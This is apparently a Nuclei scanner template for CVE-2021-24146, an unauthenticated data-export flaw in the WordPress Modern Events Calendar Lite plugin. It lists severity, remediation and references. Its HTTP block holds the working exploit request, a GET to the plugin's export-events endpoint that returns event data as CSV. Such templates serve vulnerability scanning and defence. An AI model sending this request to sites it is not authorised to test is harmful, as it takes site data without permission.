id: CVE-2021-24146 info: name: WordPress Modern Events Calendar Lite <5.16.5 - Sensitive Information Disclosure author: random_robbie severity: high description: WordPress Modern Events Calendar Lite before 5.16.5 does not properly restrict access to the export files, allowing unauthenticated users to exports all events data in CSV or XML format. impact: | An attacker can exploit this vulnerability to gain access to sensitive information, such as user credentials or database contents. remediation: | Update to the latest version of the Modern Events Calendar Lite plugin (5.16.5 or higher) to fix the vulnerability. reference: - https://wpscan.com/vulnerability/c7b1ebd6-3050-4725-9c87-0ea525f8fecc - http://packetstormsecurity.com/files/163345/WordPress-Modern-Events-Calendar-5.16.2-Information-Disclosure.html - https://nvd.nist.gov/vuln/detail/CVE-2021-24146 - https://github.com/Hacker5preme/Exploits - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N cvss-score: 7.5 cve-id: CVE-2021-24146 cwe-id: CWE-862,CWE-284 epss-score: 0.02727 epss-percentile: 0.90292 cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: webnus product: modern_events_calendar_lite framework: wordpress tags: cve,cve2021,wpscan,packetstorm,wordpress,wp-plugin,webnus http: - method: GET path: - "{{BaseURL}}/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv" matchers-condition: and matchers: - type: word part: header words: - "mec-events" - "text/csv" condition: and - type: status status: - 200 # digest: 4b0a00483046022100b31aad67d362d0077658450c16624d12ced8ad163722f1b93e91549d5c6763ed022100fd8913dc9b6791ef83d3094c8f59276a2802b77a20cbf55c3f760ccf03f401e8:922c64590222798bb761d5b6d8e72950